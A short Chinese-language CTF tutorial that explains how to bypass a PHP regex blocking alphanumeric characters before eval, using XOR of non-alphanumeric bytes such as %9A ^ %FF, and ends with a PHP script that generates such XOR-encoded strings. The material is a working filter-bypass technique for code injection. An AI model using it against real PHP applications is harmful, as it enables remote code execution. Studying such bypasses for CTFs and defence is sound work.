在一些ctf或是实战里
我们有时候能看到类似
if(preg_match('/[A-Za-z0-9]+/', $code)) { die('NO.'); } @eval($code);这样的绕过 这种正则只要命中一个字母或者数字就会退出
但php有一个特性 php字符串的两个字符按位异或后可以直接得到新字符
所以可以利用这种方式来绕过这种限制
二进制异或:
A | B | A XOR B |
0 | 0 | 0 |
0 | 1 | 1 |
1 | 0 | 1 |
1 | 1 | 0 |
一句话 相同为0,不同为1.
我们大部分用%ff进行异或,例如
目标字母 e 的 ASCII 是 0x65。0x65 ^ 0xFF = 0x9A。所以%9A ^ %FF => e(这里%9A实际上就是0x9A
最后附上一个异或脚本
<?php $l=''; $r=''; $argv= str_split("e");//更改里面的值,改为需要的字符 for($i=0;$i<count($argv);$i++) { for($j=0;$j<255;$j++) { $k=chr($j)^chr(255); if($k==$argv[$i]) { if($j<16) { $l.="%ff"; $r.="%0".dechex($j); continue; } $l.="%ff"; $r.="%".dechex($j); } } } echo "\{$l^$r\}";
